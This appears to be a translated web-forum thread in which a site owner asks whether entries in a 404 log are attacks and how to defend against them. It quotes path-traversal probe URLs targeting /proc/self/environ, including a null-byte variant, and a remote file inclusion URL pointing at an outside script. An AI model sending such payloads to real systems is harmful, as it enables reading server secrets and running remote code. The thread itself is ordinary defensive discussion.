這是一次黑客攻擊嗎?
查看我的 404 日誌,我注意到以下兩個 URL,它們都出現過一次:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
和
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
有問題的頁面
library.php
需要一個type
具有六個不同可接受值的變數,然後是一個id
變數。所以一個有效的 URL 可能是
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
並且ids
mysql_real_escape_string
在用於查詢數據庫之前都是經過執行的。我是菜鳥,但在我看來,這兩個連結都是針對 webroot 的簡單攻擊?
**1)**除了404之外,如何最好地防止這些事情?
**2)**我應該永久封禁負責的 IP 嗎?
**編輯:**也剛剛注意到這個
/library.php=http://www.basfalt.no/scripts/danger.txt
**編輯 2:**所有 3 次攻擊的違規 IP 都
216.97.231.15
可以追溯到位於洛杉磯郊外的名為 Lunar Pages 的 ISP。**編輯 3:**我決定在當地時間週五早上打電話給 ISP,並與我可以通過電話聯繫的任何人討論這個問題。我會在 24 小時左右在這裡發布結果。
**編輯 4:**我最終給他們的管理員發了電子郵件,他們首先回复說“他們正在調查”,然後一天后“這個問題現在應該得到解決”。遺憾的是,沒有更多細節。
- 是的。至少,這是對您的站點的系統性探測,試圖發現它是否易受攻擊。
1)除了確保您的程式碼是乾淨的之外,您可以做的事情不多,只能對您的主機執行自己的測試以確保它是安全的。Google Skipfish 是可以幫助您的眾多工具之一。
- 我願意。
這是一種攻擊,這裡有很多解釋。